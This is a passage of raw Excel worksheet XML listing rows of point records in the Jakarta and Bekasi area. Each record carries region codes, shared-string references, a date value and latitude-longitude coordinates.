      <c r="H988" t="s">
        <v>26</v>
      </c>
      <c r="I988" t="s">
        <v>1253</v>
      </c>
      <c r="J988" t="s">
        <v>1035</v>
      </c>
      <c r="L988" t="s">
        <v>250</v>
      </c>
      <c r="M988">
        <v>3175050001</v>
      </c>
      <c r="N988">
        <v>3175050</v>
      </c>
      <c r="O988">
        <v>3175</v>
      </c>
      <c r="P988">
        <v>31</v>
      </c>
      <c r="Q988" t="s">
        <v>1037</v>
      </c>
      <c r="R988" t="s">
        <v>1013</v>
      </c>
      <c r="S988" t="s">
        <v>547</v>
      </c>
      <c r="T988" t="s">
        <v>33</v>
      </c>
      <c r="U988" s="5">
        <v>10689549</v>
      </c>
      <c r="V988" s="5" t="s">
        <v>15372</v>
      </c>
      <c r="W988" s="5">
        <v>-615493</v>
      </c>
      <c r="X988" t="s">
        <v>19163</v>
      </c>
      <c r="Y988" t="str">
        <f t="shared" si="15"/>
        <v>-6.15493,106.89549</v>
      </c>
    </row>
    <row r="989" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A989">
        <v>108559</v>
      </c>
      <c r="B989" s="1">
        <v>43884</v>
      </c>
      <c r="C989">
        <v>0</v>
      </c>
      <c r="D989" t="s">
        <v>22</v>
      </c>
      <c r="E989" t="s">
        <v>23</v>
      </c>
      <c r="F989" t="s">
        <v>3781</v>
      </c>
      <c r="G989" t="s">
        <v>3782</v>
      </c>
      <c r="H989" t="s">
        <v>26</v>
      </c>
      <c r="I989" t="s">
        <v>197</v>
      </c>
      <c r="J989" t="s">
        <v>2868</v>
      </c>
      <c r="L989" t="s">
        <v>3783</v>
      </c>
      <c r="M989">
        <v>3172080001</v>
      </c>
      <c r="N989">
        <v>3172080</v>
      </c>
      <c r="O989">
        <v>3172</v>
      </c>
      <c r="P989">
        <v>31</v>
      </c>
      <c r="Q989" t="s">
        <v>48</v>
      </c>
      <c r="R989" t="s">
        <v>141</v>
      </c>
      <c r="S989" t="s">
        <v>49</v>
      </c>
      <c r="T989" t="s">
        <v>33</v>
      </c>
      <c r="U989" s="5">
        <v>10690358</v>
      </c>
      <c r="V989" s="5" t="s">
        <v>15373</v>
      </c>
      <c r="W989" s="5">
        <v>-620912</v>
      </c>
      <c r="X989" t="s">
        <v>19164</v>
      </c>
      <c r="Y989" t="str">
        <f t="shared" si="15"/>
        <v>-6.20912,106.90358</v>
      </c>
    </row>
    <row r="990" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A990">
        <v>108560</v>
      </c>
      <c r="B990" s="1">
        <v>43884</v>
      </c>
      <c r="C990">
        <v>0</v>
      </c>
      <c r="D990" t="s">
        <v>22</v>
      </c>
      <c r="E990" t="s">
        <v>23</v>
      </c>
      <c r="F990" t="s">
        <v>3784</v>
      </c>
      <c r="H990" t="s">
        <v>26</v>
      </c>
      <c r="I990" t="s">
        <v>197</v>
      </c>
      <c r="J990" t="s">
        <v>2802</v>
      </c>
      <c r="L990" t="s">
        <v>3785</v>
      </c>
      <c r="M990">
        <v>3172080002</v>
      </c>
      <c r="N990">
        <v>3172080</v>
      </c>
      <c r="O990">
        <v>3172</v>
      </c>
      <c r="P990">
        <v>31</v>
      </c>
      <c r="Q990" t="s">
        <v>2804</v>
      </c>
      <c r="R990" t="s">
        <v>141</v>
      </c>
      <c r="S990" t="s">
        <v>49</v>
      </c>
      <c r="T990" t="s">
        <v>33</v>
      </c>
      <c r="U990" s="5">
        <v>10693398</v>
      </c>
      <c r="V990" s="5" t="s">
        <v>15374</v>
      </c>
      <c r="W990" s="5">
        <v>-619289</v>
      </c>
      <c r="X990" t="s">
        <v>19165</v>
      </c>
      <c r="Y990" t="str">
        <f t="shared" si="15"/>
        <v>-6.19289,106.93398</v>
      </c>
    </row>
    <row r="991" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A991">
        <v>108561</v>
      </c>
      <c r="B991" s="1">
        <v>43884</v>
      </c>
      <c r="C991">
        <v>0</v>
      </c>
      <c r="D991" t="s">
        <v>85</v>
      </c>
      <c r="E991" t="s">
        <v>23</v>
      </c>
      <c r="F991" t="s">
        <v>3786</v>
      </c>
      <c r="G991" t="s">
        <v>3787</v>
      </c>
      <c r="H991" t="s">
        <v>26</v>
      </c>
      <c r="I991" t="s">
        <v>103</v>
      </c>
      <c r="J991" t="s">
        <v>2276</v>
      </c>
      <c r="K991" t="s">
        <v>3788</v>
      </c>
      <c r="L991" t="s">
        <v>3789</v>
      </c>
      <c r="M991">
        <v>3172080006</v>
      </c>
      <c r="N991">
        <v>3172080</v>
      </c>
      <c r="O991">
        <v>3172</v>
      </c>
      <c r="P991">
        <v>31</v>
      </c>
      <c r="Q991" t="s">
        <v>2853</v>
      </c>
      <c r="R991" t="s">
        <v>141</v>
      </c>
      <c r="S991" t="s">
        <v>49</v>
      </c>
      <c r="T991" t="s">
        <v>33</v>
      </c>
      <c r="U991" s="5">
        <v>10692945</v>
      </c>
      <c r="V991" s="5" t="s">
        <v>15375</v>
      </c>
      <c r="W991" s="5">
        <v>-616361</v>
      </c>
      <c r="X991" t="s">
        <v>19166</v>
      </c>
      <c r="Y991" t="str">
        <f t="shared" si="15"/>
        <v>-6.16361,106.92945</v>
      </c>
    </row>
    <row r="992" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A992">
        <v>108562</v>
      </c>
      <c r="B992" s="1">
        <v>43884</v>
      </c>
      <c r="C992">
        <v>0</v>
      </c>
      <c r="D992" t="s">
        <v>22</v>
      </c>
      <c r="E992" t="s">
        <v>23</v>
      </c>
      <c r="F992" t="s">
        <v>3790</v>
      </c>
      <c r="G992" t="s">
        <v>3791</v>
      </c>
      <c r="H992" t="s">
        <v>26</v>
      </c>
      <c r="I992" t="s">
        <v>197</v>
      </c>
      <c r="J992" t="s">
        <v>1519</v>
      </c>
      <c r="L992" t="s">
        <v>3792</v>
      </c>
      <c r="M992">
        <v>3175010003</v>
      </c>
      <c r="N992">
        <v>3175010</v>
      </c>
      <c r="O992">
        <v>3175</v>
      </c>
      <c r="P992">
        <v>31</v>
      </c>
      <c r="Q992" t="s">
        <v>545</v>
      </c>
      <c r="R992" t="s">
        <v>546</v>
      </c>
      <c r="S992" t="s">
        <v>547</v>
      </c>
      <c r="T992" t="s">
        <v>33</v>
      </c>
      <c r="U992" s="5">
        <v>10677634</v>
      </c>
      <c r="V992" s="5" t="s">
        <v>15376</v>
      </c>
      <c r="W992" s="5">
        <v>-614178</v>
      </c>
      <c r="X992" t="s">
        <v>19167</v>
      </c>
      <c r="Y992" t="str">
        <f t="shared" si="15"/>
        <v>-6.14178,106.77634</v>
      </c>
    </row>
    <row r="993" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A993">
        <v>108563</v>
      </c>
      <c r="B993" s="1">
        <v>43884</v>
      </c>
      <c r="C993">
        <v>0</v>
      </c>
      <c r="D993" t="s">
        <v>22</v>
      </c>
      <c r="E993" t="s">
        <v>23</v>
      </c>
      <c r="F993" t="s">
        <v>3793</v>
      </c>
      <c r="G993" t="s">
        <v>3794</v>
      </c>
      <c r="H993" t="s">
        <v>26</v>
      </c>
      <c r="I993" t="s">
        <v>166</v>
      </c>
      <c r="J993" t="s">
        <v>2627</v>
      </c>
      <c r="L993" t="s">
        <v>3795</v>
      </c>
      <c r="M993">
        <v>3216100006</v>
      </c>
      <c r="N993">
        <v>3216100</v>
      </c>
      <c r="O993">
        <v>3216</v>
      </c>
      <c r="P993">
        <v>32</v>
      </c>
      <c r="Q993" t="s">
        <v>939</v>
      </c>
      <c r="R993" t="s">
        <v>940</v>
      </c>
      <c r="S993" t="s">
        <v>41</v>
      </c>
      <c r="T993" t="s">
        <v>42</v>
      </c>
      <c r="U993" s="5">
        <v>10699540</v>
      </c>
      <c r="V993" s="5" t="s">
        <v>15377</v>
      </c>
      <c r="W993" s="5">
        <v>-612073</v>
      </c>
      <c r="X993" t="s">
        <v>19168</v>
      </c>
      <c r="Y993" t="str">
        <f t="shared" si="15"/>
        <v>-6.12073,106.99540</v>
      </c>
    </row>
    <row r="994" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A994">
        <v>108564</v>
      </c>
      <c r="B994" s="1">
        <v>43884</v>
      </c>
      <c r="C994">
        <v>0</v>
      </c>
      <c r="D994" t="s">
        <v>22</v>
      </c>
      <c r="E994" t="s">
        <v>23</v>
      </c>
      <c r="F994" t="s">
        <v>3796</v>
      </c>
      <c r="G994" t="s">
        <v>3797</v>
      </c>
      <c r="H994" t="s">
        <v>26</v>
      </c>
      <c r="I994" t="s">
        <v>181</v>
      </c>
      <c r="J994" t="s">
        <v>3798</v>
      </c>
      <c r="L994" t="s">
        <v>3799</v>
      </c>
      <c r="M994">
        <v>3172040004</v>
      </c>
      <c r="N994">
        <v>3172040</v>
      </c>
      <c r="O994">
        <v>3172</v>
      </c>
      <c r="P994">
        <v>31</v>
      </c>
      <c r="Q994" t="s">
        <v>280</v>
      </c>
      <c r="R994" t="s">
        <v>281</v>
      </c>
      <c r="S994" t="s">
        <v>49</v>
      </c>
      <c r="T994" t="s">
        <v>33</v>
      </c>
      <c r="U994" s="5">
        <v>10688411</v>
      </c>
      <c r="V994" s="5" t="s">
        <v>15378</v>
      </c>
      <c r="W994" s="5">
        <v>-627565</v>
      </c>
      <c r="X994" t="s">
        <v>19169</v>
      </c>
      <c r="Y994" t="str">
        <f t="shared" si="15"/>
        <v>-6.27565,106.88411</v>
      </c>
    </row>
    <row r="995" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A995">
        <v>108565</v>
      </c>
      <c r="B995" s="1">
        <v>43884</v>
      </c>
      <c r="C995">
        <v>0</v>
      </c>
      <c r="D995" t="s">
        <v>85</v>
      </c>
      <c r="E995" t="s">
        <v>23</v>
      </c>
      <c r="F995" t="s">
        <v>3800</v>
      </c>
      <c r="G995" t="s">
        <v>3801</v>
      </c>
      <c r="H995" t="s">
        <v>26</v>
      </c>
      <c r="J995" t="s">
        <v>3802</v>
      </c>
      <c r="K995" t="s">
        <v>3803</v>
      </c>
      <c r="L995" t="s">
        <v>3804</v>
      </c>
      <c r="M995">
        <v>3175050003</v>
      </c>
      <c r="N995">
        <v>3175050</v>
      </c>
      <c r="O995">
        <v>3175</v>
      </c>
      <c r="P995">
        <v>31</v>
      </c>
      <c r="Q995" t="s">
        <v>1740</v>
      </c>
      <c r="R995" t="s">
        <v>1013</v>
      </c>
      <c r="S995" t="s">
        <v>547</v>
      </c>
      <c r="T995" t="s">
        <v>33</v>
      </c>
      <c r="U995" s="5">
        <v>10691588</v>
      </c>
      <c r="V995" s="5" t="s">
        <v>15379</v>
      </c>
      <c r="W995" s="5">
        <v>-616881</v>
      </c>
      <c r="X995" t="s">
        <v>19170</v>
      </c>
      <c r="Y995" t="str">
        <f t="shared" si="15"/>
        <v>-6.16881,106.91588</v>
      </c>
    </row>
    <row r="996" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A996">
        <v>108566</v>
      </c>
      <c r="B996" s="1">
        <v>43884</v>
      </c>
      <c r="C996">
        <v>0</v>
      </c>
      <c r="D996" t="s">
        <v>22</v>
      </c>
      <c r="E996" t="s">
        <v>23</v>
      </c>
      <c r="F996" t="s">
        <v>3805</v>
      </c>
      <c r="G996" t="s">
        <v>3806</v>
      </c>
      <c r="H996" t="s">
        <v>26</v>
      </c>
      <c r="I996" t="s">
        <v>792</v>
      </c>
      <c r="J996" t="s">
        <v>2369</v>
      </c>
      <c r="L996" t="s">
        <v>3807</v>
      </c>
      <c r="M996">
        <v>3175050001</v>
      </c>
      <c r="N996">
        <v>3175050</v>
      </c>
      <c r="O996">
        <v>3175</v>
      </c>
      <c r="P996">
        <v>31</v>
      </c>
      <c r="Q996" t="s">
        <v>1037</v>
      </c>
      <c r="R996" t="s">
        <v>1013</v>
      </c>
      <c r="S996" t="s">
        <v>547</v>
      </c>
      <c r="T996" t="s">
        <v>33</v>
      </c>
      <c r="U996" s="5">
        <v>10689132</v>
      </c>
      <c r="V996" s="5" t="s">
        <v>15380</v>
      </c>
      <c r="W996" s="5">
        <v>-615274</v>
      </c>
      <c r="X996" t="s">
        <v>19171</v>
      </c>
      <c r="Y996" t="str">
        <f t="shared" si="15"/>
        <v>-6.15274,106.89132</v>
      </c>
    </row>
    <row r="997" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A997">
        <v>108568</v>
      </c>
      <c r="B997" s="1">
        <v>43884</v>
      </c>
      <c r="C997">
        <v>0</v>
      </c>
      <c r="D997" t="s">
        <v>85</v>
      </c>
      <c r="E997" t="s">
        <v>23</v>
      </c>
      <c r="F997" t="s">
        <v>3808</v>
      </c>
      <c r="G997" t="s">
        <v>3809</v>
      </c>
      <c r="H997" t="s">
        <v>26</v>
      </c>
      <c r="J997" t="s">
        <v>3810</v>
      </c>
      <c r="K997" t="s">
        <v>3811</v>
      </c>
      <c r="L997" t="s">
        <v>3812</v>
      </c>
      <c r="M997">
        <v>3175050003</v>
      </c>
      <c r="N997">
        <v>3175050</v>
      </c>
      <c r="O997">
        <v>3175</v>
      </c>
      <c r="P997">
        <v>31</v>
      </c>
      <c r="Q997" t="s">
        <v>1740</v>
      </c>
      <c r="R997" t="s">
        <v>1013</v>
      </c>
      <c r="S997" t="s">
        <v>547</v>
      </c>
      <c r="T997" t="s">
        <v>33</v>
      </c>
      <c r="U997" s="5">
        <v>10691375</v>
      </c>
      <c r="V997" s="5" t="s">
        <v>15381</v>
      </c>
      <c r="W997" s="5">
        <v>-618087</v>
      </c>
      <c r="X997" t="s">
        <v>19172</v>
      </c>
      <c r="Y997" t="str">
        <f t="shared" si="15"/>
        <v>-6.18087,106.91375</v>
      </c>
    </row>
    <row r="998" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A998">
        <v>108569</v>
      </c>
      <c r="B998" s="1">
        <v>43884</v>
      </c>
      <c r="C998">
        <v>0</v>
      </c>
      <c r="D998" t="s">
        <v>22</v>
      </c>
      <c r="E998" t="s">
        <v>23</v>
      </c>
      <c r="F998" t="s">
        <v>3813</v>
      </c>
      <c r="G998" t="s">
        <v>3814</v>
      </c>
      <c r="H998" t="s">
        <v>26</v>
      </c>
      <c r="I998" t="s">
        <v>27</v>
      </c>
      <c r="J998" t="s">
        <v>3815</v>
      </c>
      <c r="L998" t="s">
        <v>3816</v>
      </c>
      <c r="M998">
        <v>3172100005</v>
      </c>
      <c r="N998">
        <v>3172100</v>
      </c>
      <c r="O998">
        <v>3172</v>
      </c>
      <c r="P998">
        <v>31</v>
      </c>
      <c r="Q998" t="s">
        <v>1773</v>
      </c>
      <c r="R998" t="s">
        <v>1436</v>
      </c>
      <c r="S998" t="s">
        <v>49</v>
      </c>
      <c r="T998" t="s">
        <v>33</v>
      </c>
      <c r="U998" s="5">
        <v>10686986</v>
      </c>
      <c r="V998" s="5" t="s">
        <v>15382</v>
      </c>
      <c r="W998" s="5">
        <v>-620248</v>
      </c>
      <c r="X998" t="s">
        <v>18290</v>
      </c>
      <c r="Y998" t="str">
        <f t="shared" si="15"/>
        <v>-6.20248,106.86986</v>
      </c>
    </row>
    <row r="999" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A999">
        <v>108570</v>
      </c>
      <c r="B999" s="1">
        <v>43884</v>
      </c>
      <c r="C999">
        <v>0</v>
      </c>
      <c r="D999" t="s">
        <v>22</v>
      </c>
      <c r="E999" t="s">
        <v>23</v>
      </c>
      <c r="F999" t="s">
        <v>3817</v>
      </c>
      <c r="H999" t="s">
        <v>26</v>
      </c>
      <c r="I999" t="s">
        <v>1359</v>
      </c>
      <c r="J999" t="s">
        <v>2536</v>
      </c>
      <c r="L999" t="s">
        <v>3818</v>
      </c>
      <c r="M999">
        <v>3172040005</v>
      </c>
      <c r="N999">
        <v>3172040</v>
      </c>
      <c r="O999">
        <v>3172</v>
      </c>
      <c r="P999">
        <v>31</v>
      </c>
      <c r="Q999" t="s">
        <v>1351</v>
      </c>
      <c r="R999" t="s">
        <v>281</v>
      </c>
      <c r="S999" t="s">
        <v>49</v>
      </c>
      <c r="T999" t="s">
        <v>33</v>
      </c>
      <c r="U999" s="5">
        <v>10690114</v>
      </c>
      <c r="V999" s="5" t="s">
        <v>15383</v>
      </c>
      <c r="W999" s="5">
        <v>-624751</v>
      </c>
      <c r="X999" t="s">
        <v>19173</v>
      </c>
      <c r="Y999" t="str">
        <f t="shared" si="15"/>
        <v>-6.24751,106.90114</v>
      </c>
    </row>
    <row r="1000" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1000">
        <v>108571</v>
      </c>
      <c r="B1000" s="1">
        <v>43884</v>
      </c>
      <c r="C1000">
        <v>0</v>
      </c>
      <c r="D1000" t="s">
        <v>22</v>
      </c>
      <c r="E1000" t="s">
        <v>23</v>
      </c>
      <c r="F1000" t="s">
        <v>3819</v>
      </c>
      <c r="G1000" t="s">
        <v>3820</v>
      </c>
      <c r="H1000" t="s">
        <v>26</v>
      </c>
      <c r="I1000" t="s">
        <v>1359</v>
      </c>
      <c r="J1000" t="s">
        <v>3821</v>
      </c>
      <c r="L1000" t="s">
        <v>3822</v>
      </c>
      <c r="M1000">
        <v>3175050002</v>
      </c>
      <c r="N1000">
        <v>3175050</v>
      </c>
      <c r="O1000">
        <v>3175</v>
      </c>
      <c r="P1000">
        <v>31</v>
      </c>
      <c r="Q1000" t="s">
        <v>1012</v>
      </c>
      <c r="R1000" t="s">
        <v>1013</v>
      </c>
      <c r="S1000" t="s">
        <v>547</v>
      </c>
      <c r="T1000" t="s">
        <v>33</v>
      </c>
      <c r="U1000" s="5">
        <v>10690520</v>
      </c>
      <c r="V1000" s="5" t="s">
        <v>15384</v>
      </c>
      <c r="W1000" s="5">
        <v>-616201</v>
      </c>
      <c r="X1000" t="s">
        <v>19174</v>
      </c>
      <c r="Y1000" t="str">
        <f t="shared" si="15"/>
        <v>-6.16201,106.90520</v>
      </c>
    </row>
    <row r="1001" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1001">
        <v>108572</v>
      </c>
      <c r="B1001" s="1">
        <v>43884</v>
      </c>
      <c r="C1001">
        <v>0</v>
      </c>
      <c r="D1001" t="s">
        <v>85</v>
      </c>
      <c r="E1001" t="s">
        <v>23</v>
      </c>
      <c r="F1001" t="s">
        <v>3823</v>
      </c>
      <c r="G1001" t="s">
        <v>3824</v>
      </c>
      <c r="H1001" t="s">
        <v>26</v>
      </c>
      <c r="J1001" t="s">
        <v>2352</v>
      </c>
      <c r="K1001" t="s">
        <v>3825</v>
      </c>
      <c r="L1001" t="s">
        <v>3826</v>
      </c>
      <c r="M1001">
        <v>3173050002</v>
      </c>
      <c r="N1001">
        <v>3173050</v>
      </c>
      <c r="O1001">
        <v>3173</v>
      </c>
      <c r="P1001">
        <v>31</v>
      </c>
      <c r="Q1001" t="s">
        <v>588</v>
      </c>
      <c r="R1001" t="s">
        <v>589</v>
      </c>
      <c r="S1001" t="s">
        <v>62</v>
      </c>
      <c r="T1001" t="s">
        <v>33</v>
      </c>
      <c r="U1001" s="5">
        <v>10687089</v>
      </c>
      <c r="V1001" s="5" t="s">
        <v>15385</v>
      </c>
      <c r="W1001" s="5">
        <v>-616852</v>
      </c>
      <c r="X1001" t="s">
        <v>19175</v>
      </c>
      <c r="Y1001" t="str">
        <f t="shared" si="15"/>
        <v>-6.16852,106.87089</v>
      </c>
    </row>
    <row r="1002" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1002">
        <v>108573</v>
      </c>
      <c r="B1002" s="1">
        <v>43884</v>
      </c>
      <c r="C1002">
        <v>0</v>
      </c>
      <c r="D1002" t="s">
        <v>22</v>
      </c>
      <c r="E1002" t="s">
        <v>23</v>
      </c>
      <c r="F1002" t="s">
        <v>3827</v>
      </c>
      <c r="G1002" t="s">
        <v>3828</v>
      </c>
      <c r="H1002" t="s">
        <v>26</v>
      </c>
      <c r="I1002" t="s">
        <v>1633</v>
      </c>
      <c r="J1002" t="s">
        <v>2627</v>
      </c>
      <c r="L1002" t="s">
        <v>3829</v>
      </c>
      <c r="M1002">
        <v>3275060002</v>
      </c>
      <c r="N1002">
        <v>3275060</v>
      </c>
      <c r="O1002">
        <v>3275</v>
      </c>
      <c r="P1002">
        <v>32</v>
      </c>
      <c r="Q1002" t="s">
        <v>113</v>
      </c>
      <c r="R1002" t="s">
        <v>114</v>
      </c>
      <c r="S1002" t="s">
        <v>41</v>
      </c>
      <c r="T1002" t="s">
        <v>42</v>
      </c>
      <c r="U1002" s="5">
        <v>10695536</v>
      </c>
      <c r="V1002" s="5" t="s">
        <v>15386</v>
      </c>
      <c r="W1002" s="5">
        <v>-622982</v>
      </c>
      <c r="X1002" t="s">
        <v>19176</v>
      </c>
      <c r="Y1002" t="str">
        <f t="shared" si="15"/>
        <v>-6.22982,106.95536</v>
      </c>
    </row>
    <row r="1003" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1003">
        <v>108574</v>
      </c>
      <c r="B1003" s="1">
        <v>43884</v>
      </c>
      <c r="C1003">
        <v>0</v>
      </c>
      <c r="D1003" t="s">
        <v>22</v>
      </c>
      <c r="E1003" t="s">
        <v>23</v>
      </c>
      <c r="F1003" t="s">
        <v>3830</v>
      </c>
      <c r="G1003" t="s">
        <v>3831</v>
      </c>
      <c r="H1003" t="s">
        <v>26</v>
      </c>
      <c r="I1003" t="s">
        <v>2165</v>
      </c>
      <c r="J1003" t="s">
        <v>2627</v>
      </c>
      <c r="L1003" t="s">
        <v>3832</v>
      </c>
      <c r="M1003">
        <v>3216090001</v>
      </c>
      <c r="N1003">
        <v>3216090</v>
      </c>
      <c r="O1003">
        <v>3216</v>
      </c>
      <c r="P1003">
        <v>32</v>
      </c>
      <c r="Q1003" t="s">
        <v>334</v>
      </c>
      <c r="R1003" t="s">
        <v>335</v>
      </c>
      <c r="S1003" t="s">
        <v>41</v>
      </c>
      <c r="T1003" t="s">
        <v>42</v>
      </c>
      <c r="U1003" s="5">
        <v>10701132</v>
      </c>
      <c r="V1003" s="5" t="s">
        <v>15387</v>
      </c>
      <c r="W1003" s="5">
        <v>-617465</v>
      </c>
      <c r="X1003" t="s">
        <v>19177</v>
      </c>
      <c r="Y1003" t="str">
        <f t="shared" si="15"/>
        <v>-6.17465,107.01132</v>
      </c>
    </row>
    <row r="1004" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1004">
        <v>108575</v>
      </c>
      <c r="B1004" s="1">
        <v>43884</v>
      </c>
      <c r="C1004">
        <v>0</v>
      </c>
      <c r="D1004" t="s">
        <v>22</v>
      </c>
      <c r="E1004" t="s">
        <v>23</v>
      </c>
      <c r="F1004" t="s">
        <v>3833</v>
      </c>
      <c r="G1004" t="s">
        <v>3834</v>
      </c>
      <c r="H1004" t="s">
        <v>26</v>
      </c>
      <c r="I1004" t="s">
        <v>3835</v>
      </c>
      <c r="J1004" t="s">
        <v>1590</v>
      </c>
      <c r="M1004">
        <v>3175030002</v>
      </c>
      <c r="N1004">
        <v>3175030</v>
      </c>
      <c r="O1004">
        <v>3175</v>
      </c>
      <c r="P1004">
        <v>31</v>
      </c>
      <c r="Q1004" t="s">
        <v>1592</v>
      </c>
      <c r="R1004" t="s">
        <v>1563</v>
      </c>
      <c r="S1004" t="s">
        <v>547</v>
      </c>
      <c r="T1004" t="s">
        <v>33</v>
      </c>
      <c r="U1004" s="5">
        <v>10688394</v>
      </c>
      <c r="V1004" s="5" t="s">
        <v>15388</v>
      </c>
      <c r="W1004" s="5">
        <v>-615747</v>
      </c>
      <c r="X1004" t="s">
        <v>19178</v>
      </c>
      <c r="Y1004" t="str">
        <f t="shared" si="15"/>
        <v>-6.15747,106.88394</v>
      </c>
    </row>
    <row r="1005" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1005">
        <v>108576</v>
      </c>
      <c r="B1005" s="1">
        <v>43884</v>
      </c>
      <c r="C1005">
        <v>0</v>
      </c>
      <c r="D1005" t="s">
        <v>22</v>
      </c>
      <c r="E1005" t="s">
        <v>23</v>
      </c>
      <c r="F1005" t="s">
        <v>3836</v>
      </c>
      <c r="G1005" t="s">
        <v>3837</v>
      </c>
      <c r="H1005" t="s">
        <v>26</v>
      </c>
      <c r="I1005" t="s">
        <v>271</v>
      </c>
      <c r="J1005" t="s">
        <v>3838</v>
      </c>
      <c r="L1005" t="s">
        <v>3839</v>
      </c>
      <c r="M1005">
        <v>3173050003</v>
      </c>
      <c r="N1005">
        <v>3173050</v>
      </c>
      <c r="O1005">
        <v>3173</v>
      </c>
      <c r="P1005">
        <v>31</v>
      </c>
      <c r="Q1005" t="s">
        <v>2333</v>
      </c>
      <c r="R1005" t="s">
        <v>589</v>
      </c>
      <c r="S1005" t="s">
        <v>62</v>
      </c>
      <c r="T1005" t="s">
        <v>33</v>
      </c>
      <c r="U1005" s="5">
        <v>10686524</v>
      </c>
      <c r="V1005" s="5" t="s">
        <v>15389</v>
      </c>
      <c r="W1005" s="5">
        <v>-618184</v>
      </c>
      <c r="X1005" t="s">
        <v>19179</v>
      </c>
      <c r="Y1005" t="str">
        <f t="shared" si="15"/>
        <v>-6.18184,106.86524</v>
      </c>
    </row>
    <row r="1006" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1006">
        <v>108577</v>
      </c>
      <c r="B1006" s="1">
        <v>43884</v>
      </c>
      <c r="C1006">
        <v>0</v>
      </c>
      <c r="D1006" t="s">
        <v>22</v>
      </c>
      <c r="E1006" t="s">
        <v>23</v>
      </c>
      <c r="F1006" t="s">
        <v>3840</v>
      </c>
      <c r="G1006" t="s">
        <v>3841</v>
      </c>
      <c r="H1006" t="s">
        <v>26</v>
      </c>
      <c r="I1006" t="s">
        <v>628</v>
      </c>
      <c r="J1006" t="s">
        <v>2502</v>
      </c>
      <c r="L1006" t="s">
        <v>3842</v>
      </c>
      <c r="M1006">
        <v>3175060001</v>
      </c>
      <c r="N1006">
        <v>3175060</v>
      </c>
      <c r="O1006">
        <v>3175</v>
      </c>
      <c r="P1006">
        <v>31</v>
      </c>
      <c r="Q1006" t="s">
        <v>2278</v>
      </c>
      <c r="R1006" t="s">
        <v>2279</v>
      </c>
      <c r="S1006" t="s">
        <v>547</v>
      </c>
      <c r="T1006" t="s">
        <v>33</v>
      </c>
      <c r="U1006" s="5">
        <v>10691747</v>
      </c>
      <c r="V1006" s="5" t="s">
        <v>15390</v>
      </c>
      <c r="W1006" s="5">
        <v>-613930</v>
      </c>
      <c r="X1006" t="s">
        <v>19180</v>
      </c>
      <c r="Y1006" t="str">
        <f t="shared" si="15"/>
        <v>-6.13930,106.91747</v>
      </c>
    </row>
    <row r="1007" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1007">
        <v>108578</v>
      </c>
      <c r="B1007" s="1">
        <v>43884</v>
      </c>
      <c r="C1007">
        <v>0</v>
      </c>
      <c r="D1007" t="s">
        <v>22</v>
      </c>
      <c r="E1007" t="s">
        <v>23</v>
      </c>
      <c r="F1007" t="s">
        <v>3843</v>
      </c>
      <c r="H1007" t="s">
        <v>26</v>
      </c>
      <c r="I1007" t="s">
        <v>1394</v>
      </c>
      <c r="J1007" t="s">
        <v>3049</v>
      </c>
      <c r="L1007" t="s">
        <v>3844</v>
      </c>
      <c r="M1007">
        <v>3175060002</v>
      </c>
      <c r="N1007">
        <v>3175060</v>
      </c>
      <c r="O1007">
        <v>3175</v>
      </c>
      <c r="P1007">
        <v>31</v>
      </c>
      <c r="Q1007" t="s">
        <v>2674</v>
      </c>
      <c r="R1007" t="s">
        <v>2279</v>
      </c>
      <c r="S1007" t="s">
        <v>547</v>
      </c>
      <c r="T1007" t="s">
        <v>33</v>
      </c>
      <c r="U1007" s="5">
        <v>10694894</v>
      </c>
      <c r="V1007" s="5" t="s">
        <v>15391</v>
      </c>
      <c r="W1007" s="5">
        <v>-615174</v>
      </c>
      <c r="X1007" t="s">
        <v>19181</v>
      </c>
      <c r="Y1007" t="str">
        <f t="shared" si="15"/>
        <v>-6.15174,106.94894</v>
      </c>
    </row>
    <row r="1008" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1008">
        <v>108579</v>
      </c>
      <c r="B1008" s="1">
        <v>43884</v>
      </c>
      <c r="C1008">
        <v>0</v>
      </c>
      <c r="D1008" t="s">
        <v>85</v>
      </c>
      <c r="E1008" t="s">
        <v>23</v>
      </c>
      <c r="F1008" t="s">
        <v>3845</v>
      </c>
      <c r="G1008" t="s">
        <v>3846</v>
      </c>
      <c r="H1008" t="s">
        <v>26</v>
      </c>
      <c r="J1008" t="s">
        <v>2356</v>
      </c>
      <c r="K1008" t="s">
        <v>3847</v>
      </c>
      <c r="L1008" t="s">
        <v>3848</v>
      </c>
      <c r="M1008">
        <v>3173050002</v>
      </c>
      <c r="N1008">
        <v>3173050</v>
      </c>
      <c r="O1008">
        <v>3173</v>
      </c>
      <c r="P1008">
        <v>31</v>
      </c>
      <c r="Q1008" t="s">
        <v>588</v>
      </c>
      <c r="R1008" t="s">
        <v>589</v>
      </c>
      <c r="S1008" t="s">
        <v>62</v>
      </c>
      <c r="T1008" t="s">
        <v>33</v>
      </c>
      <c r="U1008" s="5">
        <v>10687061</v>
      </c>
      <c r="V1008" s="5" t="s">
        <v>15392</v>
      </c>
      <c r="W1008" s="5">
        <v>-617094</v>
      </c>
      <c r="X1008" t="s">
        <v>19182</v>
      </c>
      <c r="Y1008" t="str">
        <f t="shared" si="15"/>
        <v>-6.17094,106.87061</v>
      </c>
    </row>
    <row r="1009" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1009">
        <v>108580</v>
      </c>
      <c r="B1009" s="1">
        <v>43884</v>
      </c>
      <c r="C1009">
        <v>0</v>
      </c>
      <c r="D1009" t="s">
        <v>22</v>
      </c>
      <c r="E1009" t="s">
        <v>23</v>
      </c>
      <c r="F1009" t="s">
        <v>3849</v>
      </c>
